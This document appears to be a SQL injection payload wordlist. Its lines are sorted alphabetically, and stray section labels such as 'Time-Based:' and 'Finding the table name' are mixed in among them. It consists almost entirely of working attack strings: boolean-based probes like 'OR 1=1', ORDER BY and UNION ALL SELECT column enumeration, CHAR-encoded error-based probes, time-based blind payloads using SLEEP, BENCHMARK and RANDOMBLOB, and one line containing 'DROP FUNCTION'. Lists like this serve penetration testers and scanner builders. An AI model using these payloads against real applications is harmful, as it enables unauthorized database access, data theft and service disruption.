AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7506=9091 AND ('5913=5913
AND 7506=9091 AND (5913=5913
AND false
AND true
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=0--
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=1--
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
Comments:
Finding the table name
HAVING 1=0
HAVING 1=0#
HAVING 1=0--
HAVING 1=1
HAVING 1=1#
HAVING 1=1--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
OR 1=0
OR 1=0#
OR 1=0--
OR 1=1
OR 1=1#
OR 1=1--
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
OR x=x
OR x=x#
OR x=x--
OR x=y
OR x=y#
OR x=y--
ORDER BY 1
ORDER BY 1#
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5)--
ORDER BY 1--
ORDER BY 10
ORDER BY 10#
ORDER BY 10--
ORDER BY 11
ORDER BY 11#
ORDER BY 11--
ORDER BY 12
ORDER BY 12#
ORDER BY 12--
ORDER BY 13
ORDER BY 13#
ORDER BY 13--
ORDER BY 14
ORDER BY 14#
ORDER BY 14--
ORDER BY 15
ORDER BY 15#
ORDER BY 15--
ORDER BY 16
ORDER BY 16#
ORDER BY 16--
ORDER BY 17
ORDER BY 17#
ORDER BY 17--
ORDER BY 18
ORDER BY 18#
ORDER BY 18--
ORDER BY 19
ORDER BY 19#
ORDER BY 19--
ORDER BY 2
ORDER BY 2#
ORDER BY 2--
ORDER BY 20
ORDER BY 20#
ORDER BY 20--
ORDER BY 21
ORDER BY 21#
ORDER BY 21--
ORDER BY 22
ORDER BY 22#
ORDER BY 22--
ORDER BY 23
ORDER BY 23#
ORDER BY 23--
ORDER BY 24
ORDER BY 24#
ORDER BY 24--
ORDER BY 25
ORDER BY 25#
ORDER BY 25--
ORDER BY 26
ORDER BY 26#
ORDER BY 26--
ORDER BY 27
ORDER BY 27#
ORDER BY 27--
ORDER BY 28
ORDER BY 28#
ORDER BY 28--
ORDER BY 29
ORDER BY 29#
ORDER BY 29--
ORDER BY 3
ORDER BY 3#
ORDER BY 3--
ORDER BY 30
ORDER BY 30#
ORDER BY 30--
ORDER BY 31337
ORDER BY 31337#
ORDER BY 31337--
ORDER BY 4
ORDER BY 4#
ORDER BY 4--
ORDER BY 5
ORDER BY 5#
ORDER BY 5--
ORDER BY 6
ORDER BY 6#
ORDER BY 6--
ORDER BY 7
ORDER BY 7#
ORDER BY 7--
ORDER BY 8
ORDER BY 8#
ORDER BY 8--
ORDER BY 9
ORDER BY 9#
ORDER BY 9--
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
PRINT
PRINT @@variable
RANDOMBLOB(1000000000/2)
RANDOMBLOB(500000000/2)
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
Time-Based:
UNION ALL SELECT
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
